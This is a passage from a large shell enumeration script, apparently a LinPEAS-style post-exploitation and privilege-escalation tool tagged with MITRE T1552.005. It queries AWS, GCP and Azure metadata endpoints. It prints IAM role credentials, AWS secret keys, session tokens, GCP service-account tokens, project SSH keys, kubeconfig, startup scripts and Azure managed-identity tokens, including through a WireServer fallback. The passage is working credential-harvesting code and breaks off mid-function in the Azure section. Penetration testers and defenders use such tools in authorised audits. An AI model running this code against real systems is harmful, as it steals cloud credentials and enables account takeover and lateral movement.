   5216 print_list "Tencent CVM? ......................... $is_tencent_cvm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
   5217 echo ""
   5218 
   5219 fi
   5220 
   5221 if check_mitre_filter "T1552.005,T1580"; then
   5222 if [ "$is_aws_ec2" = "Yes" ]; then
   5223     print_2title "AWS EC2 Enumeration" "T1552.005,T1580"
   5224     TOKEN=""
   5225     TOKEN_HEADER="X-aws-ec2-metadata-token"
   5226     TOKEN_TTL="X-aws-ec2-metadata-token-ttl-seconds: 21600"
   5227     URL="http://169.254.169.254/latest/meta-data"
   5228     aws_req=""
   5229     if [ "$(command -v curl || echo -n '')" ]; then
   5230         # Get token for IMDSv2
   5231         TOKEN=$(curl -s -f -X PUT "http://169.254.169.254/latest/api/token" -H "$TOKEN_TTL" 2>/dev/null)
   5232         aws_req="curl -s -f -L -H '$TOKEN_HEADER: $TOKEN'"
   5233     elif [ "$(command -v wget || echo -n '')" ]; then
   5234         # Get token for IMDSv2
   5235         TOKEN=$(wget -q -O - --method=PUT --header="$TOKEN_TTL" "http://169.254.169.254/latest/api/token" 2>/dev/null)
   5236         aws_req="wget -q -O - --header '$TOKEN_HEADER: $TOKEN'"
   5237     else 
   5238         echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
   5239     fi
   5240     if [ "$aws_req" ]; then
   5241         printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
   5242         printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
   5243         printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
   5244         printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
   5245         printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
   5246         printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
   5247         echo ""
   5248         print_3title "Account Info" "T1552.005,T1580"
   5249         exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
   5250         echo ""
   5251         print_3title "Network Info" "T1552.005,T1580"
   5252         for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do 
   5253           echo "Mac: $mac"
   5254           printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
   5255           printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
   5256           printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
   5257           echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
   5258           printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
   5259           echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
   5260           printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
   5261           echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
   5262           echo ""
   5263         done
   5264         echo ""
   5265         print_3title "IAM Role" "T1552.005,T1580"
   5266         exec_with_jq eval $aws_req "$URL/iam/info"; echo ""
   5267         for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do 
   5268           echo "Role: $role"
   5269           exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
   5270           echo ""
   5271         done
   5272         echo ""
   5273         print_3title "User Data" "T1552.005,T1580"
   5274         eval $aws_req "http://169.254.169.254/latest/user-data"; echo ""
   5275         echo ""
   5276         print_3title "EC2 Security Credentials" "T1552.005,T1580"
   5277         exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
   5278         print_3title "SSM Runnig" "T1552.005,T1580"
   5279         ps aux 2>/dev/null | grep "ssm-agent" | grep -Ev "grep|sed s,ssm-agent" | sed "s,ssm-agent,${SED_RED},"
   5280     fi
   5281     echo ""
   5282 fi
   5283 
   5284 fi
   5285 
   5286 if check_mitre_filter "T1552.005,T1580"; then
   5287 if [ "$is_aws_ecs" = "Yes" ]; then
   5288     print_2title "AWS ECS Enumeration" "T1552.005,T1580"
   5289     aws_ecs_req=""
   5290     if [ "$(command -v curl || echo -n '')" ]; then
   5291         aws_ecs_req='curl -s -f'
   5292     elif [ "$(command -v wget || echo -n '')" ]; then
   5293         aws_ecs_req='wget -q -O -'
   5294     else 
   5295         echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
   5296     fi
   5297     if [ "$aws_ecs_metadata_uri" ]; then
   5298         print_3title "Container Info" "T1552.005,T1580"
   5299         exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"
   5300         echo ""
   5301         print_3title "Task Info" "T1552.005,T1580"
   5302         exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task"
   5303         echo ""
   5304     else
   5305         echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
   5306     fi
   5307     if [ "$aws_ecs_service_account_uri" ]; then
   5308         print_3title "IAM Role" "T1552.005,T1580"
   5309         exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri"
   5310         echo ""
   5311     else
   5312         echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
   5313     fi
   5314     print_3title "ECS task metadata hints" "T1552.005,T1580"
   5315     aws_exec_env=$(printenv AWS_EXECUTION_ENV 2>/dev/null)
   5316     if [ "$aws_exec_env" ]; then
   5317         printf "AWS_EXECUTION_ENV=%s\n" "$aws_exec_env"
   5318     fi
   5319     ecs_task_metadata=""
   5320     if [ "$aws_ecs_metadata_uri" ]; then
   5321         ecs_task_metadata=$(eval $aws_ecs_req "$aws_ecs_metadata_uri/task" 2>/dev/null)
   5322     fi
   5323     if [ "$ecs_task_metadata" ]; then
   5324         launch_type=$(printf "%s" "$ecs_task_metadata" | grep -oE '"LaunchType":"[^"]+"' | head -n 1 | cut -d '"' -f4)
   5325         if [ "$launch_type" ]; then
   5326             printf "ECS LaunchType reported: %s\n" "$launch_type"
   5327         fi
   5328         network_modes=$(printf "%s" "$ecs_task_metadata" | grep -oE '"NetworkMode":"[^"]+"' | cut -d '"' -f4 | sort -u | tr '\n' ' ')
   5329         if [ "$network_modes" ]; then
   5330             printf "Reported NetworkMode(s): %s\n" "$network_modes"
   5331         fi
   5332     else
   5333         echo "Unable to fetch task metadata (check ECS_CONTAINER_METADATA_URI)."
   5334     fi
   5335     echo ""
   5336     print_3title "IMDS reachability from this task" "T1552.005,T1580"
   5337     imds_token=""
   5338     imds_roles=""
   5339     imds_http_code=""
   5340     imds_tool=""
   5341     if command -v curl >/dev/null 2>&1; then
   5342         imds_tool="curl"
   5343     elif command -v wget >/dev/null 2>&1; then
   5344         imds_tool="wget"
   5345     fi
   5346     if [ "$imds_tool" = "curl" ]; then
   5347         imds_token=$(curl -s --connect-timeout 2 --max-time 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
   5348         if [ "$imds_token" ]; then
   5349             printf "[!] IMDSv2 token request succeeded (metadata reachable from this task).\n"
   5350             imds_roles=$(curl -s --connect-timeout 2 --max-time 2 -H "X-aws-ec2-metadata-token: $imds_token" "http://169.254.169.254/latest/meta-data/iam/security-credentials/" 2>/dev/null | tr '\n' ' ')
   5351             if [ "$imds_roles" ]; then
   5352                 printf "    Instance profile role(s) exposed via IMDS: %s\n" "$imds_roles"
   5353                 first_role=$(printf "%s" "$imds_roles" | awk '{print $1}')
   5354                 if [ "$first_role" ]; then
   5355                     printf "    Example: curl -H 'X-aws-ec2-metadata-token: <TOKEN>' http://169.254.169.254/latest/meta-data/iam/security-credentials/%s\n" "$first_role"
   5356                 fi
   5357             else
   5358                 printf "    No IAM role names returned (instance profile might be missing).\n"
   5359             fi
   5360         else
   5361             imds_http_code=$(curl -s -o /dev/null -w "%{http_code}" --connect-timeout 2 --max-time 2 "http://169.254.169.254/latest/meta-data/" 2>/dev/null)
   5362             case "$imds_http_code" in
   5363                 000|"")
   5364                     printf "[i] IMDS endpoint did not respond (likely blocked via hop-limit or host firewalling).\n"
   5365                     ;;
   5366                 401)
   5367                     printf "[i] IMDS requires v2 tokens but token requests are being blocked (bridge-mode tasks rely on this when hop limit = 1).\n"
   5368                     ;;
   5369                 *)
   5370                     printf "[i] IMDS GET returned HTTP %s (investigate host configuration).\n" "$imds_http_code"
   5371                     ;;
   5372             esac
   5373         fi
   5374     elif [ "$imds_tool" = "wget" ]; then
   5375         imds_token=$(wget -q -O - --timeout=2 --tries=1 --method=PUT --header="X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token" 2>/dev/null)
   5376         if [ "$imds_token" ]; then
   5377             printf "[!] IMDSv2 token request succeeded (metadata reachable from this task).\n"
   5378             imds_roles=$(wget -q -O - --timeout=2 --tries=1 --header="X-aws-ec2-metadata-token: $imds_token" "http://169.254.169.254/latest/meta-data/iam/security-credentials/" 2>/dev/null | tr '\n' ' ')
   5379             if [ "$imds_roles" ]; then
   5380                 printf "    Instance profile role(s) exposed via IMDS: %s\n" "$imds_roles"
   5381             else
   5382                 printf "    No IAM role names returned (instance profile might be missing).\n"
   5383             fi
   5384         else
   5385             wget --server-response -O /dev/null --timeout=2 --tries=1 "http://169.254.169.254/latest/meta-data/" 2>&1 | awk 'BEGIN{code=""} /^  HTTP/{code=$2} END{ if(code!="") { printf("[i] IMDS GET returned HTTP %s (token could not be retrieved).\n", code); } else { print "[i] IMDS endpoint did not respond (likely blocked)."; } }'
   5386         fi
   5387     else
   5388         echo "Neither curl nor wget were found, I can't test IMDS reachability."
   5389     fi
   5390     echo ""
   5391     print_3title "ECS agent IMDS settings" "T1552.005,T1580"
   5392     if [ -r "/etc/ecs/ecs.config" ]; then
   5393         ecs_block_line=$(grep -E "^ECS_AWSVPC_BLOCK_IMDS=" /etc/ecs/ecs.config 2>/dev/null | tail -n 1)
   5394         ecs_host_line=$(grep -E "^ECS_ENABLE_TASK_IAM_ROLE_NETWORK_HOST=" /etc/ecs/ecs.config 2>/dev/null | tail -n 1)
   5395         if [ "$ecs_block_line" ]; then
   5396             printf "%s\n" "$ecs_block_line"
   5397             if echo "$ecs_block_line" | grep -qi "=true"; then
   5398                 echo "    -> awsvpc-mode tasks should be blocked from IMDS by the ECS agent."
   5399             else
   5400                 echo "    -> awsvpc-mode tasks can still reach IMDS (set this to true to block)."
   5401             fi
   5402         else
   5403             echo "ECS_AWSVPC_BLOCK_IMDS not set (awsvpc tasks inherit host IMDS reachability)."
   5404         fi
   5405         if [ "$ecs_host_line" ]; then
   5406             printf "%s\n" "$ecs_host_line"
   5407             if echo "$ecs_host_line" | grep -qi "=false"; then
   5408                 echo "    -> Host-network tasks lose IAM task roles but IMDS is blocked."
   5409             else
   5410                 echo "    -> Host-network tasks keep IAM task roles and retain IMDS access."
   5411             fi
   5412         else
   5413             echo "ECS_ENABLE_TASK_IAM_ROLE_NETWORK_HOST not set (defaults keep IMDS reachable for host-mode tasks)."
   5414         fi
   5415     else
   5416         echo "Cannot read /etc/ecs/ecs.config (file missing or permissions denied)."
   5417     fi
   5418     echo ""
   5419     print_3title "DOCKER-USER IMDS filtering" "T1552.005,T1580"
   5420     iptables_cmd=""
   5421     if command -v iptables >/dev/null 2>&1; then
   5422         iptables_cmd=$(command -v iptables)
   5423     elif command -v iptables-nft >/dev/null 2>&1; then
   5424         iptables_cmd=$(command -v iptables-nft)
   5425     fi
   5426     if [ "$iptables_cmd" ]; then
   5427         docker_rules=$($iptables_cmd -S DOCKER-USER 2>/dev/null)
   5428         if [ $? -eq 0 ]; then
   5429             if [ "$docker_rules" ]; then
   5430                 echo "$docker_rules"
   5431             else
   5432                 echo "(DOCKER-USER chain exists but no rules were found)"
   5433             fi
   5434             if echo "$docker_rules" | grep -q "169\\.254\\.169\\.254"; then
   5435                 echo "    -> IMDS traffic is explicitly filtered before Docker NAT."
   5436             else
   5437                 echo "    -> No DOCKER-USER rule drops 169.254.169.254 traffic (bridge tasks rely on hop limit or host firewalling)."
   5438             fi
   5439         else
   5440             echo "Unable to read DOCKER-USER chain (missing chain or insufficient permissions)."
   5441         fi
   5442     else
   5443         echo "iptables binary not found; cannot inspect DOCKER-USER chain."
   5444     fi
   5445     echo ""
   5446 fi
   5447 
   5448 fi
   5449 
   5450 if check_mitre_filter "T1552.005,T1580"; then
   5451 if [ "$is_aws_lambda" = "Yes" ]; then
   5452   print_2title "AWS Lambda Enumeration" "T1552.005,T1580"
   5453   printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
   5454   printf "Region: "; env | grep AWS_REGION
   5455   printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY
   5456   printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID
   5457   printf "Session token: "; env | grep AWS_SESSION_TOKEN
   5458   printf "Security token: "; env | grep AWS_SECURITY_TOKEN
   5459   printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API
   5460   printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
   5461   echo ""
   5462 fi
   5463 
   5464 fi
   5465 
   5466 if check_mitre_filter "T1552.005,T1580"; then
   5467 if [ "$is_aws_codebuild" = "Yes" ]; then
   5468   print_2title "AWS Codebuild Enumeration" "T1552.005,T1580"
   5469   aws_req=""
   5470   if [ "$(command -v curl || echo -n '')" ]; then
   5471       aws_req="curl -s -f"
   5472   elif [ "$(command -v wget || echo -n '')" ]; then
   5473       aws_req="wget -q -O -"
   5474   else 
   5475       echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
   5476       echo "The addresses are in /codebuild/output/tmp/env.sh"
   5477   fi
   5478   if [ "$aws_req" ]; then
   5479     print_3title "Credentials" "T1552.005,T1580"
   5480     CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2)
   5481     URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig
   5482     exec_with_jq eval $aws_req "$URL_CREDS"; echo ""
   5483     print_3title "Container Info" "T1552.005,T1580"
   5484     METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2)
   5485     exec_with_jq eval $aws_req "$METADATA_URL"; echo ""
   5486   fi
   5487   echo ""
   5488 fi
   5489 
   5490 fi
   5491 
   5492 if check_mitre_filter "T1552.005,T1580"; then
   5493 if [ "$is_gcp_function" = "Yes" ]; then
   5494     gcp_req=""
   5495     if [ "$(command -v curl)" ]; then
   5496         gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"'
   5497     elif [ "$(command -v wget)" ]; then
   5498         gcp_req='wget -q -O - --header "Metadata-Flavor: Google"'
   5499     else 
   5500         echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
   5501     fi
   5502     # GCP Enumeration
   5503     if [ "$gcp_req" ]; then
   5504         print_2title "Google Cloud Platform Enumeration" "T1552.005,T1580"
   5505         print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html"
   5506         ## GC Project Info
   5507         p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
   5508         [ "$p_id" ] && echo "Project-ID: $p_id"
   5509         p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
   5510         [ "$p_num" ] && echo "Project Number: $p_num"
   5511         # Instance Info
   5512         inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
   5513         [ "$inst_id" ] && echo "Instance ID: $inst_id"
   5514         mtls_info=$(eval $gcp_req http://metadata/computeMetadata/v1/instance/platform-security/auto-mtls-configuration)
   5515         [ "$mtls_info" ] && echo "MTLS info: $mtls_info"
   5516         inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
   5517         [ "$inst_zone" ] && echo "Zone: $inst_zone"
   5518         echo ""
   5519         print_3title "Service Accounts" "T1552.005,T1580"
   5520         for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
   5521             echo "  Name: $sa"
   5522             echo "  Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}email")
   5523             echo "  Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}aliases")
   5524             echo "  Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}identity")
   5525             echo "  Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
   5526             echo "  Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}token")
   5527             echo "  ==============  "
   5528         done
   5529     fi
   5530 fi
   5531 
   5532 fi
   5533 
   5534 if check_mitre_filter "T1552.005,T1580"; then
   5535 if [ "$is_gcp_vm" = "Yes" ]; then
   5536     gcp_req=""
   5537     if [ "$(command -v curl || echo -n '')" ]; then
   5538         gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"'
   5539     elif [ "$(command -v wget || echo -n '')" ]; then
   5540         gcp_req='wget -q -O - --header "Metadata-Flavor: Google"'
   5541     else 
   5542         echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
   5543     fi
   5544     if [ "$gcp_req" ]; then
   5545         print_2title "Google Cloud Platform Enumeration" "T1552.005,T1580"
   5546         print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html"
   5547         ## GC Project Info
   5548         p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
   5549         [ "$p_id" ] && echo "Project-ID: $p_id"
   5550         p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
   5551         [ "$p_num" ] && echo "Project Number: $p_num"
   5552         pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys')
   5553         [ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k"
   5554         p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true')
   5555         [ "$p_attrs" ] && echo "All Project Attributes: $p_attrs"
   5556         # OSLogin Info
   5557         osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users)
   5558         [ "$osl_u" ] && echo "OSLogin users: $osl_u"
   5559         osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups)
   5560         [ "$osl_g" ] && echo "OSLogin Groups: $osl_g"
   5561         osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys)
   5562         [ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk"
   5563         osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize)
   5564         [ "$osl_au" ] && echo "OSLogin Authorize: $osl_au"
   5565         # Instance Info
   5566         inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description)
   5567         [ "$inst_d" ] && echo "Instance Description: "
   5568         inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname)
   5569         [ "$inst_hostn" ] && echo "Hostname: $inst_hostn"
   5570         inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
   5571         [ "$inst_id" ] && echo "Instance ID: $inst_id"
   5572         inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image)
   5573         [ "$inst_img" ] && echo "Instance Image: $inst_img"
   5574         inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type)
   5575         [ "$inst_mt" ] && echo "Machine Type: $inst_mt"
   5576         inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name)
   5577         [ "$inst_n" ] && echo "Instance Name: $inst_n"
   5578         inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags)
   5579         [ "$inst_tag" ] && echo "Instance tags: $inst_tag"
   5580         inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
   5581         [ "$inst_zone" ] && echo "Zone: $inst_zone"
   5582         inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location")
   5583         [ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc"
   5584         inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name")
   5585         [ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name"
   5586         inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin")
   5587         [ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e"
   5588         inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels")
   5589         [ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab"
   5590         inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig")
   5591         [ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec"
   5592         inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env")
   5593         [ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv"
   5594         echo ""
   5595         print_3title "Interfaces" "T1552.005,T1580"
   5596         for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do 
   5597             echo "  IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip")
   5598             echo "  Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
   5599             echo "  Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
   5600             echo "  DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
   5601             echo "  Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network")
   5602             echo "  ==============  "
   5603         done
   5604         echo ""
   5605         print_3title "User Data" "T1552.005,T1580"
   5606         echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script")
   5607         echo ""
   5608         echo ""
   5609         print_3title "Service Accounts" "T1552.005,T1580"
   5610         for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
   5611             echo "  Name: $sa"
   5612             echo "  Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email")
   5613             echo "  Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases")
   5614             echo "  Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity")
   5615             echo "  Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
   5616             echo "  Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token")
   5617             echo "  ==============  "
   5618         done
   5619     fi
   5620     echo ""
   5621 fi
   5622 
   5623 fi
   5624 
   5625 if check_mitre_filter "T1552.005,T1580"; then
   5626 az_vm_json_value() {
   5627   if [ "$(command -v jq || echo -n '')" ]; then
   5628     jq -r "$1 // empty" 2>/dev/null
   5629   elif [ "$(command -v python3 || echo -n '')" ]; then
   5630     python3 -c 'import json,sys
   5631 obj=json.load(sys.stdin)
   5632 cur=obj
   5633 for p in sys.argv[1].strip(".").split("."):
   5634     if not p:
   5635         continue
   5636     cur = cur.get(p, {}) if isinstance(cur, dict) else {}
   5637 print(cur if isinstance(cur, str) else "")' "$1" 2>/dev/null
   5638   else
   5639     sed -n "s/.*\"$2\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p" | head -n 1
   5640   fi
   5641 }
   5642 az_vm_request() {
   5643   if [ "$(command -v curl || echo -n '')" ]; then
   5644     curl -s -f -L -H "$HEADER" "$1" 2>/dev/null
   5645   elif [ "$(command -v wget || echo -n '')" ]; then
   5646     wget -q -O - --header "$HEADER" "$1" 2>/dev/null
   5647   fi
   5648 }
   5649 az_vm_request_arm() {
   5650   if [ "$(command -v curl || echo -n '')" ]; then
   5651     curl -s -f -L -H "Authorization: Bearer $1" "$2" 2>/dev/null
   5652   elif [ "$(command -v wget || echo -n '')" ]; then
   5653     wget -q -O - --header "Authorization: Bearer $1" "$2" 2>/dev/null
   5654   fi
   5655 }
   5656 az_vm_print_token() {
   5657   _az_vm_token_url="$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=$2"
   5658   if [ "$3" ]; then
   5659     _az_vm_token_url="${_az_vm_token_url}\&$3"
   5660   fi
   5661   print_3title "$1" "T1552.005,T1580"
   5662   exec_with_jq eval $az_req "$_az_vm_token_url"
   5663   echo ""
   5664 }
   5665 az_vm_print_standard_tokens() {
   5666   az_vm_print_token "Management token$1" "https://management.azure.com/" "$2"
   5667   az_vm_print_token "Graph token$1" "https://graph.microsoft.com/" "$2"
   5668   az_vm_print_token "Vault token$1" "https://vault.azure.net/" "$2"
   5669   az_vm_print_token "Storage token$1" "https://storage.azure.com/" "$2"
   5670 }
   5671 az_vm_request_wireserver() {
   5672   _az_vm_wire_header="$1"
   5673   _az_vm_wire_url="$2"
   5674   if [ "$(command -v curl || echo -n '')" ]; then
   5675     if [ "$_az_vm_wire_header" ]; then
   5676       curl -s -f -L --connect-timeout 2 --max-time 5 -H "$_az_vm_wire_header" "$_az_vm_wire_url" 2>/dev/null
   5677     else
   5678       curl -s -f -L --connect-timeout 2 --max-time 5 "$_az_vm_wire_url" 2>/dev/null
   5679     fi
   5680   elif [ "$(command -v wget || echo -n '')" ]; then
   5681     if [ "$_az_vm_wire_header" ]; then
   5682       wget -q -O - --timeout 5 --tries 1 --header "$_az_vm_wire_header" "$_az_vm_wire_url" 2>/dev/null
   5683     else
   5684       wget -q -O - --timeout 5 --tries 1 "$_az_vm_wire_url" 2>/dev/null
   5685     fi
   5686   fi
   5687 }
   5688 az_vm_try_wire_identity_tokens() {
   5689   print_3title "WireServer/HostGAPlugin managed identity fallback" "T1552.005,T1580"
   5690   print_info "ARM identity discovery failed. Trying WireServer GoalState, ExtensionsConfig and HostGAPlugin /vmSettings for identity-looking selectors. These endpoints are environment-dependent and may expose no managed identity data."
   5691   _az_vm_wire_data="$(
   5692     az_vm_request_wireserver "x-ms-version: 2012-11-30" "http://168.63.129.16/machine?comp=goalstate"
   5693     az_vm_request_wireserver "x-ms-version: 2012-11-30" "http://168.63.129.16/machine/?comp=goalstate"
   5694     az_vm_request_wireserver "" "http://168.63.129.16:32526/vmSettings"
   5695   )"
   5696   if [ "$_az_vm_wire_data" ]; then
   5697     printf "%s\n" "$_az_vm_wire_data" | grep -Eio '([A-Za-z0-9_./:-]*Identity[A-Za-z0-9_./:-]*|Microsoft\.ManagedIdentity/userAssignedIdentities/[^"<>[:space:]]+|clientId["[:space:]:=]+[0-9a-fA-F-]{36}|IdentityClientId[^0-9a-fA-F]*[0-9a-fA-F-]{36})' | sort -u | head -n 80
   5698     if [ "$(command -v jq || echo -n '')" ]; then
   5699       printf "%s" "$_az_vm_wire_data" | jq -r '.. | objects | to_entries[]? | select((.key|test("(?i)(clientId|IdentityClientId)$")) and (.value|type=="string")) | .value' 2>/dev/null | sort -u | while read -r _az_vm_wire_client_id; do
   5700         if printf "%s" "$_az_vm_wire_client_id" | grep -Eq '^[0-9a-fA-F-]{36}$'; then
   5701           print_info "Trying IMDS tokens for WireServer-discovered client_id=$_az_vm_wire_client_id"
   5702           az_vm_print_standard_tokens " for WireServer client_id $_az_vm_wire_client_id" "client_id=$_az_vm_wire_client_id"
   5703         fi
   5704       done
   5705     fi
   5706     printf "%s\n" "$_az_vm_wire_data" | grep -Eio '/subscriptions/[^"<>[:space:]]+/resourceGroups/[^"<>[:space:]]+/providers/Microsoft\.ManagedIdentity/userAssignedIdentities/[^"<>[:space:]]+' | sort -u | while read -r _az_vm_wire_res_id; do
   5707       print_info "Trying IMDS tokens for WireServer-discovered msi_res_id=$_az_vm_wire_res_id"
   5708       az_vm_print_standard_tokens " for WireServer msi_res_id" "msi_res_id=$_az_vm_wire_res_id"
   5709     done
   5710   else
   5711     echo "WireServer/HostGAPlugin did not return data from this context."
   5712   fi
   5713   echo ""
   5714 }
   5715 if [ "$is_az_vm" = "Yes" ]; then
   5716   print_2title "Azure VM Enumeration" "T1552.005,T1580"
   5717   HEADER="Metadata:true"
   5718   URL="http://169.254.169.254/metadata"
   5719   API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
   5720   set_azure_request_command
